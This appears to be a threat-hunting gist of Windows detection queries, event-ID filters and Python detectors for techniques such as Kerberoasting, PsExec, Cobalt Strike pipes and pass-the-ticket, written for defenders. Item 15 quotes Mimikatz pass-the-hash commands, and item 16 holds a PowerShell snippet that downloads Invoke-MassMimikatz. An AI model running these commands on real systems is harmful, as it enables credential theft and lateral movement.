@0xAnalyst
Last active May 7, 2025 09:59
1- T1174 - Password Filter - catch malicious password filters via the event log
index=wineventlog EventID=4614
AND NOT NotificationPackageName IN ("scecli", "RASSFM", "WDIGEST", "KDCSVC", "KDCPW")
Reference
https://twitter.com/xknow_infosec/status/1178747476976820228
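The same allowlist logic as the Splunk search above, applied to events exported as Windows event XML. This is an added example in Python, not code from the gist; the sample events are constructed, the allowlist mirrors the exclusion list in the search, and the comparison is case-insensitive because the registry value that loads these packages is.

```python
import xml.etree.ElementTree as ET

# Packages Windows registers itself (mirrors the exclusion list in the Splunk search above).
KNOWN_NOTIFICATION_PACKAGES = {"scecli", "rassfm", "wdigest", "kdcsvc", "kdcpw"}
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def parse_event(xml_text):
    """Return (EventID, Computer, {Data Name: text}) for one event rendered as Windows event XML."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    computer = root.findtext("e:System/e:Computer", default="", namespaces=NS)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, computer, data


def unexpected_notification_packages(xml_events):
    """Return [(computer, package)] for every 4614 whose package is not on the allowlist."""
    hits = []
    for xml_text in xml_events:
        event_id, computer, data = parse_event(xml_text)
        if event_id != 4614:
            continue
        package = data.get("NotificationPackageName", "")
        if package.lower() not in KNOWN_NOTIFICATION_PACKAGES:
            hits.append((computer, package))
    return hits


def _event_xml(event_id, computer, package):
    # Constructed sample in the Security channel's XML layout (not captured from a real host).
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>{event_id}</EventID><Computer>{computer}</Computer></System>
  <EventData><Data Name="NotificationPackageName">{package}</Data></EventData>
</Event>"""


SAMPLE_EVENTS = [
    _event_xml(4614, "DC01.corp.local", "scecli"),
    _event_xml(4614, "DC01.corp.local", "RASSFM"),
    _event_xml(4614, "DC02.corp.local", "CustomFilter"),  # constructed: a DLL name not on the allowlist
    _event_xml(4608, "DC02.corp.local", ""),              # different event id, ignored
]

if __name__ == "__main__":
    for computer, package in unexpected_notification_packages(SAMPLE_EVENTS):
        print(f"{computer}: unexpected notification package {package!r}")
```

4614 is only written when LSA loads the package, i.e. at boot or after the LSA process restarts, so a filter installed weeks ago shows up once; keep the retention of the Security log on domain controllers long enough for that single event to survive.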
2- T1113 - Screen Capture
look for NirCmd executions
look for PowerShell executions with "screenshot" in the arguments
3- T1074 - Data Staged
enable object access auditing on files and folders - Event ID 4663 - look for reads/copies of many different files in a short time span. Use Bro (Zeek)
and Yara to look for suspicious file copies over SMB on the network
https://twitter.com/CyberRaiju/status/1176025535761141761
4- T1087 - Account Discovery
Sysmon process creation (Event ID 1): consecutive execution of net commands
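Items 3 and 4 are the same detection shape: many distinct values from one actor inside a short window. The block below is an added Python example (not part of the gist) with one sliding-window burst detector that serves both: 4663 object-access events grouped by logon session and counted by distinct file, and Sysmon event 1 net.exe executions grouped by user and counted by distinct command line. The records, the thresholds (20 files in 60 s, 3 net commands in 30 s) and the field names are assumptions to tune per environment.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def find_bursts(events, group_by, distinct_field, window, threshold):
    """Return [(group, time, distinct_count)] for each group that produced at least
    `threshold` distinct values of `distinct_field` inside any sliding `window`.
    One entry per group, emitted at the moment the threshold is first crossed."""
    per_group = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        per_group[ev[group_by]].append((ev["time"], ev[distinct_field]))
    alerts = []
    for group, seq in per_group.items():
        recent = deque()
        for t, value in seq:
            recent.append((t, value))
            while t - recent[0][0] > window:      # drop entries older than the window
                recent.popleft()
            distinct = {v for _, v in recent}
            if len(distinct) >= threshold:
                alerts.append((group, t, len(distinct)))
                break
    return alerts


def staged_data_bursts(events, window=timedelta(seconds=60), threshold=20):
    """Item 3: one logon session touching many distinct files (4663) in a short span."""
    reads = [e for e in events if e.get("EventID") == 4663]
    return find_bursts(reads, "SubjectLogonId", "ObjectName", window, threshold)


def net_enumeration_bursts(events, window=timedelta(seconds=30), threshold=3):
    """Item 4: consecutive net.exe / net1.exe executions (Sysmon event 1) by one user."""
    net = [e for e in events if e.get("EventID") == 1
           and e.get("Image", "").lower().endswith(("\\net.exe", "\\net1.exe"))]
    return find_bursts(net, "User", "CommandLine", window, threshold)


BASE = datetime(2025, 5, 7, 9, 0, 0)


def _ev(seconds, **fields):
    return {"time": BASE + timedelta(seconds=seconds), **fields}


# Constructed sample telemetry (not real logs), already flattened into field/value records:
# one session reads 25 files in 36 s, another reads 3; one user runs three net commands in 8 s.
SAMPLE_EVENTS = (
    [_ev(i * 1.5, EventID=4663, SubjectLogonId="0x3e8b",
         ObjectName=f"C:\\Finance\\report_{i}.xlsx") for i in range(25)]
    + [_ev(i * 10, EventID=4663, SubjectLogonId="0x5a10",
           ObjectName=f"C:\\Users\\bob\\doc_{i}.docx") for i in range(3)]
    + [_ev(100 + i * 4, EventID=1, User="CORP\\alice",
           Image="C:\\Windows\\System32\\net.exe", CommandLine=cmd)
       for i, cmd in enumerate(['net user /domain', 'net group "Domain Admins" /domain',
                                'net localgroup administrators'])]
    + [_ev(300, EventID=1, User="CORP\\bob", Image="C:\\Windows\\System32\\net1.exe",
           CommandLine="net use")]
)

if __name__ == "__main__":
    for group, when, n in staged_data_bursts(SAMPLE_EVENTS):
        print(f"logon {group} touched {n} distinct files within 60 s (at {when:%H:%M:%S})")
    for group, when, n in net_enumeration_bursts(SAMPLE_EVENTS):
        print(f"{group} ran {n} net commands within 30 s (at {when:%H:%M:%S})")
```

Grouping 4663 by SubjectLogonId rather than by account name keeps an interactive session separate from a scheduled task running as the same user; backup agents and indexers will trip the file threshold and need their own exclusions.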
5- T1171 - LLMNR/NBT-NS Poisoning and Relay
look for service creation with a binary path under AppData\Local\Temp or Temp and an image name like winexecsvc.exe / psexecsvc.exe
Event ID 4697
Filter on Service File Name:
5-1 detect renamed PsExec by its file version info:
Description: Execute Files remotely
Product: Sysinternals PSexec
https://twitter.com/cyb3rops/status/1130747925242482688
Second detection:
4624 logon type 2 with the process name c:\windows\psexecsvc.exe
Detection based on 5145 - PsExec
[EventID=5145 and TargetFileName contains *-stdin or *-stdout or *-stderr]
[EventID=5145 and not (TargetFileName contains *psexecsvc*) and TargetFileName contains *-stdin or *-stdout or *-stderr] -> means the attacker changed the default PsExec service name.
https://threatexpress.com/blogs/2018/threat-mitigation-strategies-technical-recommendations-and-info-part-2/
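The two 5145 queries above, implemented over sample records. This is an added Python example, not code from the gist: the 5145 records are constructed, and the fields use the event's own schema (ShareName for the share, RelativeTargetName for the pipe), which the queries above call TargetFileName. PsExec opens its stdin/stdout/stderr pipes under \\*\IPC$ with the service name as the stem, so a pipe with that suffix but without the default stem is the renamed-service case.

```python
import re

PIPE_SUFFIX = re.compile(r"-(stdin|stdout|stderr)$", re.IGNORECASE)
# Default PsExec service/pipe stem (the page spells it psexecsvc in item 5 and PSEXESVC in item 12).
DEFAULT_STEMS = ("psexesvc", "psexecsvc")


def classify_psexec_pipe(ev):
    """For one 5145 record return 'psexec', 'renamed-psexec' or None."""
    if ev.get("EventID") != 5145:
        return None
    if not ev.get("ShareName", "").upper().endswith("IPC$"):  # named pipes live under \\*\IPC$
        return None
    target = ev.get("RelativeTargetName", "")
    if not PIPE_SUFFIX.search(target):
        return None
    lowered = target.lower()
    return "psexec" if any(stem in lowered for stem in DEFAULT_STEMS) else "renamed-psexec"


def psexec_activity(events):
    """Count flagged pipe opens per (client IP, subject user, classification)."""
    counts = {}
    for ev in events:
        kind = classify_psexec_pipe(ev)
        if kind:
            key = (ev.get("IpAddress"), ev.get("SubjectUserName"), kind)
            counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed 5145 records (not captured from a real host); field names follow the event schema.
SAMPLE_EVENTS = [
    {"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "PSEXESVC-WS01-4128-stdin",
     "IpAddress": "10.0.0.5", "SubjectUserName": "alice"},
    {"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "PSEXESVC-WS01-4128-stdout",
     "IpAddress": "10.0.0.5", "SubjectUserName": "alice"},
    {"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "UpdSvc-WS01-4132-stderr",
     "IpAddress": "10.0.0.9", "SubjectUserName": "svc_deploy"},      # suffix present, stem renamed
    {"EventID": 5145, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc",
     "IpAddress": "10.0.0.9", "SubjectUserName": "svc_deploy"},      # ordinary RPC pipe
    {"EventID": 5145, "ShareName": "\\\\*\\C$", "RelativeTargetName": "Temp\\notes-stdin",
     "IpAddress": "10.0.0.7", "SubjectUserName": "bob"},             # a file, not a pipe
    {"EventID": 5140, "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "PSEXESVC-WS01-4128-stdin"},
]

if __name__ == "__main__":
    for (ip, user, kind), n in psexec_activity(SAMPLE_EVENTS).items():
        print(f"{kind:15} {n} pipe(s) from {ip} as {user}")
```

5145 requires the "Detailed File Share" audit subcategory and is high-volume on file servers; scoping the collection to IPC$ and to the three suffixes keeps the cost manageable.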
6- Hunt for .URL/.ini - PowerShell script to enumerate the network with this Yara rule
https://twitter.com/Hexacorn/status/1176185705585926144
7- Detect Kerberos password change without Lsass.exe
[network where destination_port == 464 and process_name != "lsass.exe"]
8- Detect UAC bypass via wsreset.exe
parent process name is wsreset.exe (Sysmon / EDR)
9- Kerberos ticket theft via Mimikatz/WCE
(Mimikatz) look for .kirbi files on endpoints; (WCE) look for file creations of wce_krbtkts and wce_ccache. Yara search: https://github.com/gentilkiwi/mimikatz/blob/master/kiwi_passwords.yar#L45
10- Detect Kerberoasting
Event ID 4769, Ticket Options: 0x40810000, Ticket Encryption: 0x17
Need to filter out service accounts (Account Name) & computers (Service Name)
https://twitter.com/mgreen27/status/1178531676491640832
https://www.trustedsec.com/2018/05/art_of_kerberoast/
**Log Source**: Windows Security Event Log (Domain Controllers)
**Event ID**: 4769
**Status**: 0x0 (Audit Success)
**Ticket Encryption**: 0x17 (RC4)
**Service Name**: NOT krbtgt or NOT a system account (account name ends in $)
**TargetUserName**: NOT a system account (*$@*)
https://twitter.com/machosec/status/1011664801074905088
https://github.com/Velocidex/velociraptor/blob/master/artifacts/definitions/Windows/EventLogs/Kerbroasting.yaml
AD attribute msDS-SupportedEncryptionTypes: https://www.youtube.com/watch?v=yrMGRhyoyGs
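The 4769 filter described above, applied as code and then aggregated per requester. This is an added Python example and not code from the gist or from the linked Velociraptor artifact. The records are constructed; the ticket-options check can be switched off for environments where it is too strict, and the "3 distinct service accounts" threshold is an assumption.

```python
from collections import defaultdict


def is_kerberoast_candidate(ev, require_ticket_options=True):
    """Apply the page's 4769 filter: audit success, RC4 (0x17), optionally ticket options
    0x40810000, service is neither krbtgt nor a computer account, requester is not a computer."""
    if ev.get("EventID") != 4769:
        return False
    if ev.get("Status", "").lower() != "0x0":
        return False
    if ev.get("TicketEncryptionType", "").lower() != "0x17":
        return False
    if require_ticket_options and ev.get("TicketOptions", "").lower() != "0x40810000":
        return False
    service = ev.get("ServiceName", "")
    if service.lower() == "krbtgt" or service.endswith("$"):
        return False
    if "$@" in ev.get("TargetUserName", ""):   # machine accounts look like WS01$@CORP.LOCAL
        return False
    return True


def roasting_requesters(events, min_services=3):
    """Group candidates by (requesting user, client IP) and keep those that requested tickets
    for at least `min_services` distinct service accounts; the threshold is an assumption."""
    by_requester = defaultdict(set)
    for ev in events:
        if is_kerberoast_candidate(ev):
            by_requester[(ev["TargetUserName"], ev.get("IpAddress"))].add(ev["ServiceName"])
    return {k: sorted(v) for k, v in by_requester.items() if len(v) >= min_services}


def _tgs(user, ip, service, enc="0x17", options="0x40810000", status="0x0"):
    # Constructed 4769 record (not a real log line)
    return {"EventID": 4769, "TargetUserName": user, "IpAddress": ip, "ServiceName": service,
            "TicketEncryptionType": enc, "TicketOptions": options, "Status": status}


SAMPLE_EVENTS = [
    _tgs("alice@CORP.LOCAL", "::ffff:10.0.0.5", "svc_sql"),
    _tgs("alice@CORP.LOCAL", "::ffff:10.0.0.5", "svc_web"),
    _tgs("alice@CORP.LOCAL", "::ffff:10.0.0.5", "svc_backup"),
    _tgs("alice@CORP.LOCAL", "::ffff:10.0.0.5", "FS01$"),                   # computer account: excluded
    _tgs("alice@CORP.LOCAL", "::ffff:10.0.0.5", "krbtgt"),                  # TGT: excluded
    _tgs("bob@CORP.LOCAL", "::ffff:10.0.0.7", "svc_sql", enc="0x12"),       # AES: excluded
    _tgs("bob@CORP.LOCAL", "::ffff:10.0.0.7", "svc_web"),                   # one RC4 request only
    _tgs("WS02$@CORP.LOCAL", "::ffff:10.0.0.8", "svc_sql"),                 # requester is a computer
    _tgs("carol@CORP.LOCAL", "::ffff:10.0.0.9", "svc_sql", status="0x1b"),  # failure: excluded
]

if __name__ == "__main__":
    for (user, ip), services in roasting_requesters(SAMPLE_EVENTS).items():
        print(f"{user} from {ip} requested RC4 tickets for {len(services)} services: {services}")
```

The remaining noise comes from service accounts whose msDS-SupportedEncryptionTypes still allows only RC4: every legitimate client will request 0x17 tickets for them. Fixing the attribute (or rotating those accounts to AES) reduces both the detection noise and the exposure.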
11- CobaltStrike Beacon Hunting
JA3/JA3S hashes
Digital certificate sha256
CobaltStrike's SMB Beacon named pipes are "status_(numbers)" and "msagent_(numbers)"
Sysmon EventID 17 and EventID 18 with a pipe name starting with "msagent_*".
https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f
12- Hunting for service creation
7045/4697 - %%COMSPEC%% OR cmd.exe OR powershell.exe OR long strings.
4697 --
Service Name: PSEXESVC
Service File Name: %SystemRoot%\PSEXESVC.exe
Service installed - enabled through the audit policy System > Security System Extension
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697
https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html
https://cyberwardog.blogspot.com/2017/04/
https://medium.com/@bromiley/digging-into-sysinternals-psexec-64c783bace2b
13- Hunting for suspicious scheduled tasks
Event ID 4698 - look at the <Command> element of the task XML for:
cscript.exe wscript.exe rundll32.exe regsvr32.exe wmic.exe cmd.exe mshta.exe powershell.exe
https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html
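Items 11, 12 and 13 all reduce to matching one field of one event type against a pattern, so the block below is one added Python example (not code from the gist) with a small rule table covering all three: service installs (4697/7045) whose binary is a shell or lives under a temp/appdata path or is unusually long, scheduled tasks (4698) whose Command is one of the script hosts listed above, and Sysmon pipe events (17/18) whose pipe name is the msagent_/status_ pattern. The records are constructed; the 250-character "long string" cut-off is an assumption, and the pipe regex also accepts hex digits where the page says "numbers".

```python
import re

SCRIPT_HOSTS = ("cscript.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe",
                "wmic.exe", "cmd.exe", "mshta.exe", "powershell.exe")
LONG_PATH = 250   # assumption: service binary paths longer than this are worth a look

RULES = [
    # (event ids, field, pattern, label)
    ({4697, 7045}, "ServiceFileName",
     re.compile(r"%comspec%|\bcmd\.exe\b|\bpowershell\.exe\b", re.I), "shell used as service binary"),
    ({4697, 7045}, "ServiceFileName",
     re.compile(r"\\(temp|appdata)\\", re.I), "service binary under a temp/appdata path"),
    ({4698}, "Command",
     re.compile(r"\b(" + "|".join(re.escape(x) for x in SCRIPT_HOSTS) + r")\b", re.I),
     "scheduled task runs a script host / built-in tool"),
    ({17, 18}, "PipeName",
     re.compile(r"^\\(msagent|status)_[0-9a-f]+$", re.I), "Cobalt Strike SMB beacon pipe name"),
]


def normalise(ev):
    """7045 (System log) names the binary ImagePath; 4697 (Security log) calls it ServiceFileName."""
    ev = dict(ev)
    if "ImagePath" in ev and "ServiceFileName" not in ev:
        ev["ServiceFileName"] = ev["ImagePath"]
    return ev


def inspect(ev):
    """Return the list of rule labels an event matches (empty list when nothing matched)."""
    ev = normalise(ev)
    labels = [label for ids, field, rx, label in RULES
              if ev.get("EventID") in ids and rx.search(ev.get(field, ""))]
    if ev.get("EventID") in (4697, 7045) and len(ev.get("ServiceFileName", "")) > LONG_PATH:
        labels.append("unusually long service binary path")
    return labels


# Constructed records (not real logs); only the fields the rules look at are included.
SAMPLE_EVENTS = [
    {"EventID": 4697, "ServiceName": "svc_tmp", "ServiceFileName": "%COMSPEC% /c whoami > C:\\out.txt"},
    {"EventID": 7045, "ServiceName": "UpdaterSvc", "ImagePath": "C:\\Users\\alice\\AppData\\Local\\Temp\\upd.exe"},
    {"EventID": 4697, "ServiceName": "PSEXESVC", "ServiceFileName": "%SystemRoot%\\PSEXESVC.exe"},
    {"EventID": 4697, "ServiceName": "Long", "ServiceFileName": "C:\\svc\\" + "A" * 300 + ".exe"},
    {"EventID": 4698, "TaskName": "\\Maint", "Command": "mshta.exe"},
    {"EventID": 4698, "TaskName": "\\Backup", "Command": "C:\\Program Files\\Backup\\agent.exe"},
    {"EventID": 17, "Image": "C:\\Windows\\System32\\rundll32.exe", "PipeName": "\\msagent_1a"},
    {"EventID": 18, "Image": "C:\\Windows\\System32\\svchost.exe", "PipeName": "\\srvsvc"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for label in inspect(ev):
            print(f"event {ev['EventID']}: {label}")
```

The PSEXESVC record deliberately matches nothing here: the default PsExec service is covered by the name-based checks in items 5 and 12, whereas this table is for the generic shell, path, script-host and pipe patterns.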
14 - Detecting Pass the ticket - Windows
https://jblog.javelin-networks.com/blog/detecting-pass-ticket-pass-hash-attack-using-simple-wmi-commands/
1. Win32_LoggedOnUser – To query all the active Users on the target host (Username, associated session IDs).
2. Win32_LogonSessions – To query all the active logon sessions on the target host (Session IDs).
3. Correlate the username with the session ID and run the KLIST command for each unique session to determine all Kerberos tickets associated with these sessions.
4. Once we find a Kerberos ticket that doesn't belong to the session owner, someone has injected it into that session: a clear indication of a Pass-the-Ticket attack.
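Steps 3 and 4 above, as an added Python example (not code from the gist or from the linked post). The session-to-owner mapping stands in for the Win32_LoggedOnUser / Win32_LogonSession join, and the klist text is constructed in the layout of `klist -li <LogonId>` output; on a live host both would be collected with WMI and klist under a SYSTEM context. A cached ticket whose Client is not the session's owning account is reported.

```python
import re

# Constructed data (not captured from a real host).
# LogonId -> owning account, as produced by joining Win32_LoggedOnUser to Win32_LogonSession.
SESSIONS = {"0x3e7": "CORP\\WS01$", "0x5a2f1": "CORP\\bob"}

# Per-session `klist -li <LogonId>` output, trimmed to the lines this check needs.
KLIST_OUTPUT = {
    "0x3e7": """Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>     Client: WS01$ @ CORP.LOCAL
        Server: krbtgt/CORP.LOCAL @ CORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
""",
    "0x5a2f1": """Current LogonId is 0:0x5a2f1

Cached Tickets: (2)

#0>     Client: bob @ CORP.LOCAL
        Server: krbtgt/CORP.LOCAL @ CORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96

#1>     Client: administrator @ CORP.LOCAL
        Server: cifs/fs01.corp.local @ CORP.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
""",
}

CLIENT_LINE = re.compile(r"^#\d+>\s+Client:\s+(\S+)\s+@\s+(\S+)", re.MULTILINE)


def ticket_clients(klist_text):
    """Return [(client, realm)] for every cached ticket in one klist listing."""
    return [(m.group(1), m.group(2)) for m in CLIENT_LINE.finditer(klist_text)]


def injected_tickets(sessions, klist_by_session):
    """Step 4: a ticket whose client is not the session owner was injected into that session."""
    findings = []
    for logon_id, owner in sessions.items():
        owner_sam = owner.split("\\")[-1].lower()   # DOMAIN\user -> user
        for client, realm in ticket_clients(klist_by_session.get(logon_id, "")):
            if client.lower() != owner_sam:
                findings.append((logon_id, owner, f"{client}@{realm}"))
    return findings


if __name__ == "__main__":
    for logon_id, owner, ticket in injected_tickets(SESSIONS, KLIST_OUTPUT):
        print(f"session {logon_id} owned by {owner} holds a ticket for {ticket}")
```

The comparison is on the SAM account name only; in a multi-domain forest compare the realm as well, otherwise a same-named account from another domain would pass.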
15 - Detecting Pass the Hash - Windows
sekurlsa::pth /user:Administrator /domain:. /ntlm:… /run:"powershell -w hidden"
mimikatz # sekurlsa::pth /user: /domain: /ntlm: /run:"Downloads\PSTools\psexec \\hostname cmd.exe"
https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/
4624 - Logon Type 9
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624; StartTime=(Get-Date).AddHours(-1)} | Where-Object {$_.Properties[8].Value -eq 9}
https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf
16 - Threat Hunting COM Objects
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));
$o.Open("GET", "https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1", $False); $o.Send(); Write-Host $o.responseText;
17- Hunting Metasploit, Empire and CobaltStrike
Shodan:
SSL:"MetasploitSelfSignedCA"
http.favicon.hash:"-127886975"
18- Hunt for processes executed from network logons
4624-4628 - logon type 3 - same user Logon ID - exclude null IP addresses
https://www.youtube.com/watch?v=LBgBGWPJLKo&list=PLmgXfSDaY0Ubwv9Jk2aow1Pa-U8mxRdVv&index=3
The HELK/Kibana
https://twitter.com/cyb3rward0g/status/1161829320983240704?lang=en
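The correlation from item 18 as an added Python example (not code from the gist or from the HELK project): each network logon (4624, LogonType 3, with a non-null source address) is keyed by its TargetLogonId, and the process creations carrying the same value in SubjectLogonId are attributed to that remote user and host. It assumes process creation is recorded as Security event 4688, which is the event that carries SubjectLogonId; the records are constructed.

```python
from collections import defaultdict

# 4624 writes "-" when no source address applies; loopback logons are dropped too.
NULL_SOURCES = {None, "", "-", "::1", "127.0.0.1"}


def processes_from_network_logons(events):
    """Join 4624 (LogonType 3, real source IP) to the 4688 process creations that carry the
    same logon ID, so each spawned process maps to the remote user and host that started it."""
    sessions = {}
    for ev in events:
        if (ev.get("EventID") == 4624 and str(ev.get("LogonType")) == "3"
                and ev.get("IpAddress") not in NULL_SOURCES):
            sessions[ev["TargetLogonId"]] = (ev["TargetUserName"], ev["IpAddress"])
    spawned = defaultdict(list)
    for ev in events:
        if ev.get("EventID") == 4688 and ev.get("SubjectLogonId") in sessions:
            spawned[sessions[ev["SubjectLogonId"]]].append(ev.get("NewProcessName"))
    return dict(spawned)


# Constructed records (not real logs): one remote logon, one null-source network logon,
# one interactive logon, and the processes each session created.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "alice", "TargetLogonId": "0x1a2b",
     "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "WS01$", "TargetLogonId": "0x2c3d",
     "IpAddress": "-"},
    {"EventID": 4624, "LogonType": 2, "TargetUserName": "bob", "TargetLogonId": "0x3e4f",
     "IpAddress": "127.0.0.1"},
    {"EventID": 4688, "SubjectLogonId": "0x1a2b", "NewProcessName": "C:\\Windows\\System32\\cmd.exe"},
    {"EventID": 4688, "SubjectLogonId": "0x1a2b", "NewProcessName": "C:\\Windows\\System32\\whoami.exe"},
    {"EventID": 4688, "SubjectLogonId": "0x2c3d", "NewProcessName": "C:\\Windows\\System32\\svchost.exe"},
    {"EventID": 4688, "SubjectLogonId": "0x3e4f", "NewProcessName": "C:\\Windows\\System32\\notepad.exe"},
]

if __name__ == "__main__":
    for (user, ip), procs in processes_from_network_logons(SAMPLE_EVENTS).items():
        print(f"{user} from {ip} started: {', '.join(procs)}")
```

Logon IDs are unique only per boot of one host, so join within a single host and bound the window to that host's uptime when running this over a SIEM; Sysmon event 1 also carries LogonId and can replace 4688 in the second loop.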
19- hunting for malicious LDAP on the client side
Use LDAP ETW provider - Microsoft-Windows-LDAP-Client- {099614A5-5DD7-4788-8BC9-E29F43DB28FC}
https://gist.github.com/guitarrapc/35a94b908bad677a7310